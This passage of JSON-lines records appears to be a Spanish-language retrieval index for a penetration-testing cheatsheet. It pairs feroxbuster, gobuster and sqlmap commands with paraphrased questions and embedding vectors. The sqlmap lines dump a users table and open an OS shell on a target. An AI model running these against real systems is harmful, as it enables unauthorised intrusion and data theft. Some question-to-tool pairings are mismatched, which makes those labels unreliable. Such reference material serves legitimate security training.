0.07344, -0.07087, -0.01299, 0.089, 0.01864, 0.0476, 0.06042, 0.00869, -0.06538, 0.01649, 0.05906, 0.00444, 0.02791, 0.02681, -0.03644, 0.12033, 0.04542, 0.07663, -0.00466, -0.05292, -0.07797, -0.03569, -0.0306, 0.05212, 0.05173, 0.0287, -0.01558, -0.04875, -0.03937, -0.01967, -0.02212, 0.02204, 0.04008, 0.05453, -0.05979, 0.09481, 0.03762, -0.05576, -0.0616, -0.12168, -0.15627, -0.00389, 0.04567, 5e-05, 0.06224, -0.04121, -0.00178, 0.01911, -0.02417, 0.00218, -0.08536, -0.03848, -0.01257, -0.06141, 0.02003, -0.09212, -0.03639, 0.00409, -0.09946, 0.08073, 0.05013, 0.03828, 0.05144, 0.05047, -0.01261, 0.08589, 0.02528, -0.01693, -0.00135, 0.02515, -0.03459, -0.02724, 0.01765, -0.02715, -0.08568, -0.01886, 0.00333, 0.1318, 0.04783, -0.15606, 0.04466, -0.02034, 0.00363, -0.09874, 0.02729, -0.00424, 0.09241, 0.05762, -0.04015, -0.00108, 0.02443, -0.0231, 0.03641, 0.0164, -0.02698, 0.02978, 0.02754, -0.00462, -0.03228, -0.07487, -0.01407, 0.04141, 0.06247, -0.04212, -0.02434, -0.02019, -0.06731, 0.01539, 0.02585, -0.06299, -0.00906, -0.0266, -0.02635, 0.02244, 0.02196, -0.00373, 0.06797, 0.01158, 0.04461, -0.00211, -0.02169, 0.03835, 0.01814, 0.01811, -0.01059, -0.02988, -0.01388, -0.01267, 0.02603, 0.04948, 0.00452, 0.0395, 0.01628, 0.01326, -0.03921, -0.00752, 0.01331, -0.00544, 0.03927, 0.01638, 0.02648, -0.00061, 0.02608, 0.05818, 0.04287, 0.02961, 0.03844, 0.05776, -0.03665, 0.05562, -0.03666, -0.01593, -0.04856, -0.01914, -0.07094, -0.00098, 0.02287, -0.03596, -0.04949, 0.00227, 0.02786, 0.03114]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# feroxbuster\nferoxbuster -u http://IP -w WL -x php,txt,html -d 2 -t 50\nferoxbuster -u http://IP --filter-status 404 --extract-links", "indexar": "que herramienta sirve para hacer un escaneo de velocidad y probar la resistencia de los servidores?", "v": [-0.09004, -0.08337, -0.28755, -0.21745, -0.00196, -0.08699, -0.06859, -0.07062, 0.054, -0.05794, -0.09657, -0.00192, 0.04502, -0.10264, 0.06958, 0.12047, 0.0494, 0.00078, -0.06175, 0.0947, 0.00151, -0.08479, -0.04021, -0.00555, -0.03224, 0.09089, 0.01125, 0.01626, -0.1985, 0.01624, -0.02925, 0.07513, 0.11181, -0.06691, -0.08099, -0.0412, -0.00869, -0.00171, 0.04962, 0.0877, 0.01233, -0.02062, -0.07499, -0.09088, 0.02312, 0.03854, -0.08368, 0.01915, -0.06258, 0.07391, -0.0746, -0.12276, -0.02478, -0.06162, -0.09399, -0.08367, 0.15006, -0.07879, -0.01026, -0.13804, -0.10907, 0.01649, -0.00958, -0.05934, -0.00725, -0.046, -0.06047, -0.11294, -0.14358, -0.03506, -0.09688, 0.03863, 0.00747, -0.08533, -0.05554, -0.00227, -0.02655, 0.02133, 0.01914, 0.02289, 0.00747, 0.04978, -0.18448, 0.01499, -0.06761, -0.1009, 0.04564, -0.08469, 0.01493, 0.0323, 0.03407, 0.0993, 0.02022, 0.07462, 0.0243, -0.01586, 0.14938, -0.02136, 0.05206, -0.01236, 0.18437, -0.07648, -0.09168, 0.02916, 0.00077, 0.06246, 0.02583, -0.01453, -0.00568, 0.05, 0.06074, -0.01749, -0.10339, 0.06209, -0.04561, -0.04395, -0.02931, -0.08312, -0.05727, 0.02589, -0.01294, 0.02033, -0.06196, 0.02182, 0.02691, 0.00893, 0.03662, -0.01684, 0.01812, -0.08707, 0.09159, 0.01009, -0.11574, 0.00826, -0.04522, 0.00461, 0.07832, -0.07906, -0.05774, -0.06115, 0.06092, 0.03382, -0.06625, -0.07225, -0.01412, -0.00277, 0.05798, -0.0022, -0.09318, 0.01536, -0.04784, -0.0732, -0.02912, -0.00602, -0.11542, -0.0955, -0.02256, -0.02361, -0.09903, 0.06941, 0.02085, 0.0477, 0.01068, 0.10476, 0.00807, -0.0514, -0.05027, 0.05671, 0.02432, -0.02372, 0.01068, 0.0009, 0.03954, -0.06565, 0.01679, -0.01077, -0.07035, -0.01498, 0.02029, -0.03172, -0.02262, 0.01288, -0.05809, -0.03924, -0.00517, -0.05366, -0.01241, -0.03236, 0.01184, 0.047, 0.07515, 0.07299, 0.00213, -0.0055, -0.01356, 0.00157, 0.00401, -0.02761, 0.04678, -0.00311, -0.06651, -0.06938, -0.06428, -0.04677, 0.00726, 0.0457, -0.02566, 0.01361, -0.00877, 0.02242, 0.03005, 0.04685, 0.09547, 0.03078, 0.02226, 0.011, 0.05938, -9e-05, -0.0316, -0.00472, 0.02874, 0.03059, -0.00932, 0.03957, -0.02889, 0.05926, 0.0553, -0.0409, 0.02837, -0.02549, 0.03876, -0.00112, -0.01072, -0.00629, 0.00978, -0.03278, 0.05084, -0.01552, -0.06975, -0.06156, -0.03008, 0.05317, -0.02743, -0.01887, -0.01225, -0.04935, -0.00526, -0.03791, -0.03747, -0.03644, -0.00364, -0.01751, 0.06301, -0.01304, 0.01456, -0.0101]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# feroxbuster\nferoxbuster -u http://IP -w WL -x php,txt,html -d 2 -t 50\nferoxbuster -u http://IP --filter-status 404 --extract-links", "indexar": "con que puedo realizar un ataque de fuerza bruta contra una direcciΓ³n IP especΓ­fica?", "v": [-0.03208, 0.01033, -0.22776, -0.06044, -0.02189, 0.00297, 0.09163, 0.04349, -0.10112, -0.0218, 0.10353, -0.02521, -0.02393, 0.00623, -0.02616, -0.06455, 0.01451, -0.04803, -0.03504, -0.19413, -0.01938, -0.06661, 0.08201, -0.02863, -0.08273, 0.05541, -0.09968, 0.22051, -0.0926, -0.16818, -0.08382, 0.01589, 0.06932, -0.0353, 0.02985, -0.04548, -0.0735, 0.13047, 0.14567, 0.09439, -0.04409, 0.02135, -0.14314, -0.00749, 0.02563, 0.03856, 0.0405, 0.0013, -0.01599, -0.03003, -0.08914, -0.03721, -0.09849, -0.08226, -0.16027, -0.04952, 0.01087, -0.04963, -0.09479, 0.04416, -0.05063, 0.10377, -0.07073, -0.05351, 0.04497, -0.03937, -0.06781, -0.04518, -0.04137, -0.09976, -0.0657, -0.04682, -0.08583, 0.04382, -0.00515, 0.01679, 0.00111, 0.09005, -0.02251, -0.01436, -0.03852, 0.09093, -0.21569, -0.03197, -0.09088, -0.0643, 0.07246, -0.19054, -0.06671, -0.09082, 0.05241, 0.02159, -0.05086, -0.01635, -0.06595, 0.01042, -0.04089, 0.00369, -0.02414, -0.06885, -0.02948, -0.04494, -0.07514, 0.03655, 0.18946, 0.02308, -0.03492, -0.01088, 0.03058, 0.01498, -0.08416, -0.0576, -0.05753, -0.04104, 0.01673, -0.05025, -0.1483, -0.06816, 0.03117, 0.02856, -0.08516, -0.04324, -0.00385, 0.09324, -0.04891, 0.05817, 0.01451, 0.05067, -0.01254, -0.05461, -0.01192, 0.02253, 0.05054, -0.04175, 0.01895, 0.02496, -0.01429, -0.0688, -0.0174, -0.00038, 0.05724, -0.00761, 0.0222, -0.04223, 0.03203, -0.04861, -0.05031, -0.07992, -0.0952, 0.03945, 0.05918, -0.0225, 0.07068, 0.07145, -0.08652, 0.03367, 0.02475, -0.054, -0.02105, 0.07976, -0.04671, 0.01424, -0.10999, 0.00841, 0.01979, 0.01007, -0.13773, -0.03905, 0.08277, -0.02316, -0.04875, -0.00925, -0.00021, 0.02259, -0.02638, -0.06922, -0.02876, 0.02105, 0.02163, 0.01814, 0.00067, -0.03585, -0.05842, 0.00106, -0.01249, 0.01252, 0.08294, 0.02994, 0.02811, -0.00638, 0.02691, 0.03452, -0.02408, 0.04591, -0.01761, -0.05893, -0.07489, 0.03726, -0.02511, 0.02004, 0.00667, -0.04828, -0.02021, -0.00837, 0.04419, 0.03924, -0.01854, -0.00429, -0.02203, -0.00576, 0.01099, -0.01684, 0.07627, -0.07203, -0.11674, 0.00125, 0.03883, 0.00638, 0.0222, 0.03267, -0.01197, 0.04601, 0.01006, 0.00259, -0.00983, -0.0308, 0.0092, -0.08672, 0.02019, 0.04464, -0.04191, -0.0298, -0.0008, -0.0344, 0.01706, -0.01011, 0.03727, 0.00302, -0.09468, 0.02653, -0.0082, 0.03258, -0.00353, -0.05686, -0.05711, -0.0355, -0.09028, 0.0295, -0.02281, -0.04853, -0.00301, 0.04729, 0.05893, 0.01223, 0.01143, -0.01342]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# feroxbuster\nferoxbuster -u http://IP -w WL -x php,txt,html -d 2 -t 50\nferoxbuster -u http://IP --filter-status 404 --extract-links", "indexar": "existe alguna alternativa libre a feroxbuster para encontrar enlaces y recursos en una web?", "v": [-0.03551, 0.06433, -0.17309, -0.07472, -0.04103, -0.02899, -0.04561, -0.06939, -0.13049, -0.15787, -0.07257, -0.20187, -0.05123, -0.00355, 0.15291, 0.02241, -0.01929, -0.05327, 0.05632, -0.08999, -0.01644, -0.01499, -0.16321, 0.01755, -0.05102, -0.14146, -0.03108, -0.03038, -0.06851, 0.00422, 0.03531, 0.00033, -0.00632, 0.02961, -0.10285, 0.08761, 0.22259, 0.07247, 0.03679, -0.12477, -0.00146, -0.00451, -0.05327, 0.05569, -0.12776, 0.02188, -0.13681, -0.04794, 0.01149, 0.05418, -0.02889, -0.07517, -0.15557, -0.01497, -0.00811, -0.05076, 0.10402, -0.10972, -0.03845, -0.01806, -0.10651, 0.05768, -0.04554, -0.11952, 0.00666, 0.09631, -0.05204, 0.06753, -0.06103, 0.01943, -0.01789, -0.04513, 0.02019, -0.03127, -0.06678, 0.06098, 0.0818, 0.01527, 0.02767, 0.07667, -0.01525, -0.01697, 0.06238, 0.01664, -0.07291, 0.00158, 0.0589, -0.12494, 0.00823, -0.06757, 0.03081, 0.10342, -0.0053, 0.05308, -0.08483, -0.13454, -0.03725, 0.07475, -0.00503, 0.03489, 0.05274, 0.10661, -0.07221, -0.0118, 0.06293, -0.03691, 0.07131, 0.05797, -0.08085, 0.02583, 0.03637, -0.00557, 0.066, -0.02114, -0.03362, 0.00281, -0.02958, 0.04812, -0.03161, -0.0394, -0.07573, -0.01714, -0.09966, 0.00292, -0.076, 0.02936, 0.07408, 0.04063, 0.01006, -0.0824, 0.04549, -0.07067, -0.07845, -0.12502, -0.05736, -0.02735, 0.03884, 0.0036, 0.05139, -0.04437, 0.00194, -0.01181, -0.01996, -0.02155, -0.06777, -0.04032, 0.0245, -0.00337, -0.04173, -0.14439, -0.09964, -0.064, -0.01612, 0.11077, 0.00469, 0.02811, -0.04161, 0.0628, -0.05046, 0.01461, 0.00817, 0.00354, -0.04954, -0.00343, 0.00046, 0.06221, -0.04836, 0.04257, -0.10043, 0.01597, 0.00501, 0.10208, 0.09536, -0.10252, 0.04258, -0.0776, 0.00732, -0.11223, 0.03693, -0.05753, 0.04687, -0.05805, -0.08017, 0.0543, 0.01907, -0.03502, 0.05485, 0.03063, -0.08157, 0.00419, 0.01737, -0.0582, -0.07146, 0.00132, 0.05946, 0.0115, 0.02394, -0.03572, 0.00808, -0.04814, -0.10305, -0.07674, 0.05436, -0.08263, -0.03354, 0.02991, -0.03565, -0.0456, -0.00916, 0.04012, 0.07942, 0.01173, 0.04713, -0.03903, -0.05668, -0.00924, 0.08134, -0.0393, -0.02835, -0.00613, 0.01353, 0.00112, -0.0003, 0.0428, 0.06213, 0.04054, -0.02194, -0.00011, -0.04813, 0.02562, -0.00067, -0.04755, -0.02006, -0.02341, -0.00025, -0.02318, -0.00397, 0.04509, 0.02871, 0.05983, 0.01914, 0.03098, -0.019, 0.02304, 0.02904, -0.02807, -0.07471, -0.04263, -0.00575, -0.01929, 0.01657, 0.00911, -0.02471, 0.02699, 0.02475, 0.0393]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# gobuster\ngobuster dir -u http://IP -w WL -x php,txt -t 40 -b 404\ngobuster dns -d dominio.com -w WL\ngobuster vhost -u http://IP -w WL --append-domain\n```", "indexar": "que programa hay para escanear rutas en la web y encontrar archivos ocultos?", "v": [0.21523, -0.16708, -0.09502, -0.11283, 0.03481, -0.12099, -0.0009, -0.06206, 0.03414, -0.00707, -0.13238, -0.14668, 0.07747, 0.00818, 0.01861, 0.00283, 0.03489, -0.00624, 0.11898, 0.04731, -0.10003, 0.01471, 0.00573, 0.07139, -0.13372, -0.07935, 0.03617, 0.09804, -0.01139, -0.00281, 0.00311, 0.15468, 0.03685, 0.00394, -0.07086, 0.03011, 0.14444, -0.04355, 0.02694, -0.0561, 0.00269, -0.02551, -0.0877, 0.0545, 0.00547, -0.04252, -0.01114, 0.02722, 0.01548, -0.04449, -0.07855, -0.09637, -0.0699, 0.0386, 0.1032, -0.09222, -0.0952, -0.05369, -0.02922, 0.01653, -0.01444, 0.08843, 0.04204, -0.02714, -0.01022, 0.03224, 0.04995, 0.05567, -0.11193, 0.03331, 0.0327, 0.07473, 0.13011, 0.0399, -0.004, -0.02131, -0.02288, -0.02777, -0.00731, 0.03595, 0.08954, 0.01148, -0.00908, 0.11154, -0.07969, -0.01648, 0.01192, 0.01966, -0.07297, -0.03168, 0.01439, 0.06949, -0.05304, 0.08786, -0.00308, -0.07283, 0.17687, 0.00302, 0.00976, -0.02828, -0.07641, -0.05596, -0.11925, 0.14189, -0.02767, 0.15231, 0.02151, 0.02796, -0.09725, 0.1193, 0.06603, 0.00822, -0.00501, 0.01625, -0.08559, 0.08355, 0.08012, -0.01117, 0.03679, -0.09654, -0.09452, 0.04915, -0.15022, 0.05769, 0.04618, -0.01177, -0.03375, 0.089, -0.05058, 0.03693, 0.00559, -0.04341, -0.08395, -0.02931, -0.15332, -0.0399, 0.05775, 0.03304, -0.00146, -0.03231, 0.07131, -0.06075, -0.0771, 0.04609, 0.05197, 0.00256, 0.02311, -0.06303, -0.0117, -0.09374, -0.06906, 0.02892, -0.00661, 0.00678, 0.00394, 0.04537, 0.00773, -0.0707, -0.08421, 0.02216, -0.08577, 0.05649, -0.08625, -0.07881, 0.03624, -0.06502, -0.01666, 0.03595, 0.00554, -0.05458, 0.03929, 0.09203, 0.02342, -0.13298, -0.01716, 0.06111, 0.0067, -0.13152, 0.08751, -0.00549, -0.05672, 0.03457, 0.10292, 0.05779, 0.00585, -0.03919, 0.05825, -0.0341, -0.08027, 0.01638, 0.02802, -0.06904, -0.04098, 0.0226, -0.05813, -0.00363, 0.0142, 0.04436, 0.06488, -0.07165, -0.03327, -0.01677, -0.01298, -0.0133, -0.01108, 0.02091, 0.00262, -0.08476, 0.07561, 0.05554, 0.01547, -0.06177, 0.02954, -0.07024, 0.05135, -0.03807, -0.00542, 0.04501, 0.01208, 0.0125, 0.00015, -0.00736, 0.03342, 0.03111, 0.01808, -0.03538, -0.03113, 0.00897, -0.01089, -0.02874, -0.03164, -0.08628, -0.05918, -0.00645, 0.00043, -0.02506, -0.01208, 0.00961, -0.03849, -0.01827, -0.03073, 0.06105, 0.05838, -0.01509, -0.03507, -0.02845, -0.00963, 0.00628, 0.0432, 0.0264, -0.0225, 0.04453, -0.00802, -0.01753, 0.05999, -0.011]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# gobuster\ngobuster dir -u http://IP -w WL -x php,txt -t 40 -b 404\ngobuster dns -d dominio.com -w WL\ngobuster vhost -u http://IP -w WL --append-domain\n```", "indexar": "cual es una alternativa libre a gobuster para descubrir directorios?", "v": [-0.02265, -0.03782, -0.16367, 0.04953, -0.06536, 0.01785, -0.04295, -0.05503, -0.16193, -0.10067, 0.02523, -0.1824, -0.17463, -0.03131, 0.0713, -0.1273, 0.06292, -0.02016, 0.12218, -0.04933, 0.02099, 0.08449, -0.11799, 0.01012, 0.02445, -0.09622, -0.10852, -0.00012, -0.05415, 0.036, 0.02747, -0.05343, 0.04557, -0.07773, -0.05615, 0.0478, 0.1659, -0.01406, 0.00699, 0.02983, 0.08953, -0.02891, 0.00663, 0.15224, -0.07577, -0.15084, -0.03153, -0.05441, -0.02007, 0.09924, 0.03356, 0.02935, 0.01266, -0.00523, 0.14058, -0.02889, 0.04131, -0.09741, 0.00554, 0.01945, -0.07075, 0.02929, -0.04982, -0.02827, 0.00459, -0.0405, -0.0078, 0.05164, -0.07758, 0.05177, 0.03832, -0.00624, 0.10211, 0.06515, -0.11007, 0.10494, 0.02248, -0.00975, 0.06921, 0.06433, 0.09169, -0.0397, 0.10348, 0.03036, -0.04556, -0.08223, 0.07267, -0.1662, 0.03162, 0.0224, 0.06996, 0.03674, -0.04531, 0.18441, -0.00612, -0.07208, 0.01011, 0.08082, -0.05678, 0.05341, 0.07107, 0.03113, -0.19114, 0.03125, 0.0262, -0.02982, -0.05841, 0.06239, -0.13264, 0.0543, 0.04296, 0.05908, 0.05294, 0.01057, 0.00577, -0.02857, -0.04749, 0.05469, -0.0003, -0.00207, -0.08173, 0.01761, -0.08752, -0.03088, 0.031, 0.00829, 0.05765, 0.04272, -0.0251, 0.00554, 0.08045, -0.03999, -0.12, -0.04297, -0.12365, 0.00507, 0.02601, -0.01406, 0.09646, -0.04058, -0.01383, -0.00273, 0.05002, 0.00296, -0.02961, -0.01279, 0.00919, -0.00935, 0.01436, -0.04379, -0.09657, 0.01222, -0.00336, 0.16723, 0.02995, 0.01579, 0.02421, -0.02032, -0.05475, 0.06409, 0.10241, -0.05758, -0.04945, -0.01791, -0.00531, -0.07344, 0.00112, -0.03813, -0.08242, -0.02883, -0.002, 0.01272, 0.09475, -0.0625, 0.02832, -0.06274, 0.02263, -0.12511, 0.04581, -0.02089, 0.06082, 0.05086, -0.10184, 0.00626, -0.04455, -0.04026, 0.04139, -0.01036, -0.0227, 0.01154, 0.00798, 0.03935, -0.01626, -0.09463, 0.00343, -0.01264, 0.07876, -0.04623, -0.07568, -0.01528, -0.08769, 0.0241, -0.0017, -0.05096, -0.00607, -0.03861, -0.05617, 0.06874, 0.0157, 0.00744, 0.0699, 0.03538, 0.09923, -0.00992, -0.05522, 0.01743, 0.01547, -0.01269, -0.01061, -0.00684, 0.02655, -0.01784, 0.02851, 0.0064, 0.00873, 0.00697, 0.01416, 0.01637, -0.05327, 0.01941, 0.01675, -0.01764, 0.03732, 0.01896, 0.03614, 0.03374, -0.00871, 0.0473, 0.05466, 0.02119, 0.03278, 0.115, -0.01842, 0.03623, -0.03179, -0.02181, -0.07329, -0.02393, -0.04874, 0.01742, -0.01553, 0.05318, -0.00375, 0.01382, 0.01572, 0.004]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Inyeccion SQL automatica (sqlmap)\n\n```bash\nsqlmap -u \"http://IP/page?id=1\" --batch --dbs\nsqlmap -u \"http://IP/page?id=1\" -D basedatos --tables\nsqlmap -u \"http://IP/page?id=1\" -D basedatos -T users --dump\nsqlmap -r peticion.txt --batch --level 5 --risk 3 # peticion de Burp\nsqlmap -u URL --os-shell # a shell\nsqlmap -u URL --data \"user=1&pass=1\" -p user # POST\n```", "indexar": "que programa hay para hacer inyecciΓ³n SQL automΓ‘ticamente?", "v": [0.08661, 0.0183, -0.10755, -0.10553, 0.07861, -0.23449, -0.04885, -0.15123, -0.05857, 0.08701, -0.089, -0.06466, 0.09294, -0.12689, -0.10274, 0.0738, 0.0356, -0.14969, -0.07837, 0.08611, 0.10511, -0.01224, 0.00094, -0.0938, -0.07009, 0.05694, 0.01379, 0.11053, -0.06279, -0.09821, -0.06059, -0.00094, 0.05157, -0.02483, 0.03113, 0.00549, 0.03462, 0.06811, -0.00134, -0.04315, -0.03297, -0.00701, -0.14313, 0.03338, 0.08767, 0.05571, 0.21875, 0.01517, 0.02355, -0.11082, -0.01881, 0.05252, -0.00541, -0.13919, 0.00834, -0.02241, -0.02523, -0.06897, -0.11633, 0.05743, -0.02118, 0.00619, 0.03877, 0.01563, -0.0133, 0.08705, 0.14031, -0.0678, 0.06273, 0.13726, -0.05347, -0.0811, -0.01057, -0.04157, 0.02689, 0.00649, 0.03804, 0.01796, 0.05308, -0.05408, -0.17352, -0.05152, 0.01303, 0.11919, 0.03605, 0.02556, 0.09222, -0.01234, 0.03465, -0.03291, 0.01597, -0.04787, 0.0519, 0.11476, 0.07258, -0.05969, 0.12949, -0.06752, 0.00218, 0.09402, 0.02074, -0.13622, -0.00202, 0.17524, 0.01992, 0.08478, 0.09487, -0.04627, -0.05778, 0.03956, 0.04728, -0.00827, -0.05166, -0.1337, 0.0003, 0.0523, 0.04645, 0.08429, -0.02916, 0.02566, -0.12556, 0.01099, -0.03881, 0.0266, -0.02133, -0.0966, -0.07836, 0.0463, -0.07998, 0.05175, 0.01488, 0.02918, -0.03736, -0.02682, -0.11598, 0.00366, -5e-05, -0.07335, -0.06993, -0.0673, -0.00933, 0.05838, 0.04738, 0.00236, 0.0187, -0.03572, -0.00021, -0.06872, 0.01866, 0.04515, 0.04155, 0.03066, 0.05289, 0.04222, -0.02437, -0.04742, 0.05016, -0.02612, -0.04823, 0.07688, 0.0326, 0.0201, -0.0329, 0.02933, 0.03521, -0.02829, 0.00255, -0.04745, 0.03736, 0.06021, 0.01875, 0.0723, 0.08011, -0.06406, -0.01211, 0.06421, -0.00217, -0.07688, 0.11336, -0.0693, -0.03414, 0.00151, 0.02393, -0.01238, 0.01783, -0.05442, -0.03688, 0.0539, 0.05034, -0.01004, -0.01449, -0.00448, -0.01944, -0.06829, 0.02941, -0.0022, -0.01222, 0.00198, 0.05992, -0.04923, -0.05641, -0.02113, 0.01158, -0.02793, 0.00284, 0.07788, -0.02005, 0.01063, 0.02975, 0.06775, -0.03665, 0.00183, 0.01746, 0.0469, 0.00277, -0.05011, -0.02246, -0.00632, 0.0707, 0.01432, -0.02868, -0.03016, 0.07637, 0.00617, -0.03873, -0.0724, 0.01291, 0.03826, 0.04554, 0.05415, -0.02046, -0.02167, 0.00187, 0.00306, 0.09412, 0.00783, -0.02389, -0.02797, -0.01866, -0.07846, 0.01612, 0.03016, -0.00563, 0.03075, -0.03732, 0.00301, -0.03917, 0.01218, -0.00993, -0.01672, -0.00392, 0.01218, 0.00872, -0.01296, 0.01459, 0.03634]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Inyeccion SQL automatica (sqlmap)\n\n```bash\nsqlmap -u \"http://IP/page?id=1\" --batch --dbs\nsqlmap -u \"http://IP/page?id=1\" -D basedatos --tables\nsqlmap -u \"http://IP/page?id=1\" -D basedatos -T users --dump\nsqlmap -r peticion.txt --batch --level 5 --risk 3 # peticion de Burp\nsqlmap -u URL --os-shell # a shell\nsqlmap -u URL --data \"user=1&pass=1\" -p user # POST\n```", "indexar": "con que puedo automatizar la exploraciΓ³n de bases de datos vulnerables?", "v": [0.10538, 0.05614, -0.10796, -0.11874, -0.05407, 0.05539, -0.00962, -0.05386, -0.14831, -0.04173, -0.00431, -0.16513, -0.05517, 0.1018, -0.03747, 0.01392, -0.01883, -0.03862, -0.04465, 0.00169, 0.09662, -0.07368, -0.00536, -0.01978, -0.06603, 0.07914, -0.05051, -0.02528, -0.13782, 0.08813, -0.10653, 0.04919, -0.09442, 0.11094, 0.05827, 0.02717, -0.07588, 0.10668, 0.03542, -0.0592, -0.01454, 0.023, -0.08134, 0.02761, 0.23801, -0.01824, -0.13241, -0.0297, 0.06515, -0.06414, -0.08643, -0.02895, -0.11941, -0.13239, 0.02339, -0.08187, 0.12513, -0.0838, 0.10263, 0.11281, -0.0888, 0.08596, 0.09987, 0.0296, 0.0204, -0.01146, 0.14609, 0.08387, -0.03027, 0.15698, 0.03749, 0.00671, 0.06331, -0.06462, 0.02085, -0.03507, 0.01404, 0.02619, -0.03624, -0.00622, -0.04445, 0.04748, -0.01828, 0.08001, -0.0735, -0.05648, 0.03567, 0.01395, 0.00118, -0.08898, 0.13615, -0.03189, -0.07195, 0.01025, 0.01259, 0.07254, -0.00423, -0.04546, -0.02236, 0.06772, -0.0491, -0.03668, -0.01829, 0.09888, 0.15552, 0.04178, 0.06577, 0.01344, -0.07168, -0.1519, -0.0171, -0.05927, -0.04121, -0.06906, 0.03179, -0.00932, -0.00952, 0.04503, 0.06295, -0.05903, 0.03088, -0.05892, 0.00847, -0.01184, 0.02913, -0.06044, -0.03528, 0.04935, 0.05304, 0.00496, 0.04658, 0.04432, -0.08165, -0.00077, 0.073, 0.04748, -0.05049, -0.05274, -0.02064, -0.00919, 0.00404, 0.1023, -0.00907, -0.00298, 0.09761, -0.03938, 0.01426, 0.05977, -0.01502, -0.00373, -0.03626, 0.013, 0.06965, 0.12037, -0.06122, 0.00236, 0.09876, 0.03603, 0.00402, 0.03019, 0.03882, 0.05395, -0.12017, -0.01113, 0.01791, -0.03237, 0.07437, -0.04108, 0.00679, 0.02053, -0.05219, 0.06964, 0.09586, 0.02708, 0.05099, -0.03138, -0.08394, -0.00593, -0.04263, -0.01726, 0.03538, -0.06857, 0.00677, -0.03491, 0.01126, -0.02437, 0.02727, -0.11109, 0.09047, 0.03789, -0.02287, 0.04075, 0.01606, 0.06994, 0.07399, -0.07532, -0.00925, 0.08844, -0.00733, -0.05118, -0.01928, 0.06132, -0.01684, -0.02472, 0.00455, 0.07761, 0.03727, -0.00676, 0.039, -0.04062, 0.05311, -0.01555, 0.09557, -0.03457, -0.09284, -0.02264, 0.01832, -0.00315, 0.04241, -0.01735, -0.01462, 0.05181, 0.05083, -0.01361, 0.00852, 0.01189, 0.07931, -0.0103, 0.03217, -0.06934, -0.00408, 0.01956, -0.02366, 0.00058, 0.03517, 0.01565, -0.03202, -0.01798, -0.04419, -0.07525, 0.06303, 0.1004, -0.01663, -0.06308, -0.00286, -0.0388, -0.05722, 0.04099, -0.00155, -0.07384, -0.01725, -0.01225, 0.01323, -0.05923, -0.0115, -0.02107]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Inyeccion SQL automatica (sqlmap)\n\n```bash\nsqlmap -u \"http://IP/page?id=1\" --batch --dbs\nsqlmap -u \"http://IP/page?id=1\" -D basedatos --tables\nsqlmap -u \"http://IP/page?id=1\" -D basedatos -T users --dump\nsqlmap -r peticion.txt --batch --level 5 --risk 3 # peticion de Burp\nsqlmap -u URL --os-shell # a shell\nsqlmap -u URL --data \"user=1&pass=1\" -p user # POST\n```", "indexar": "cual es una herramienta que permita descargar las tablas de una base de datos sin intervenciΓ³n manual?", "v": [0.00106, 0.0858, -0.11031, -0.23006, 0.04844, -0.13095, -0.02313, -0.02197, -0.09752, 0.06674, -0.07587, -0.14458, 0.00267, -0.06345, -0.0011, 0.0591, 0.06794, -0.14368, 0.02167, -0.07606, 0.0114, 0.01611, -0.07418, 0.03977, -0.17112, -0.02802, 0.0235, -0.06815, -0.24736, 0.08228, -0.00394, -0.05584, -0.01543, -0.0765, -0.03106, 0.01423, -0.03338, 0.01731, -0.01404, -0.03896, -0.07397, -0.01193, -0.10117, 0.10807, 0.05105, -0.06044, -0.02772, 0.09972, 0.04194, 0.04992, -0.07511, -0.08329, -0.03966, -0.06423, -0.07296, -0.29812, 0.25657, -0.11478, 0.10253, -0.0706, -0.11474, 0.02618, 0.0121, 0.03988, -0.00971, 0.00188, 0.07652, -0.04208, -0.0155, 0.12983, 0.04436, 0.05628, 0.00075, -0.05704, -0.02863, -0.07579, 0.03072, -0.01339, 0.00236, -0.02218, 0.03566, -0.04643, -0.07202, 0.04446, -0.0187, -0.07079, 0.13286, 0.0042, 0.00219, -0.07327, 0.01141, 0.00974, -0.03328, 0.0194, 0.08176, -0.05677, -0.01618, 0.03023, 0.03704, 0.00933, 0.11211, -0.00339, -0.03449, 0.03534, 0.06905, 0.03044, -0.00103, 0.00084, -0.12823, 0.00681, -0.0083, 0.06896, 0.02976, 0.0324, -0.02522, 0.07003, -0.04616, -0.00733, -0.10304, -0.085, 0.02596, -0.01956, -0.00322, -0.02407, -0.0105, 0.00258, -0.02929, 0.1392, -0.01488, 0.00365, 0.01051, -0.03878, -0.02947, 0.06048, 0.0634, -0.04615, -0.00909, -0.08041, -0.05016, -0.08216, 0.00045, 0.06681, -0.04202, -0.07633, 0.06327, -0.02827, 0.03383, 0.04549, -0.06114, 0.00704, 0.05645, 0.05831, 0.04609, 0.0931, -0.01978, 0.03431, 0.01192, 0.0348, -0.08268, -0.00454, 0.00746, 0.00896, 0.04602, -0.00878, -0.0039, -0.05182, 0.01039, 0.05084, 0.06875, 0.03915, -0.01079, 0.03711, 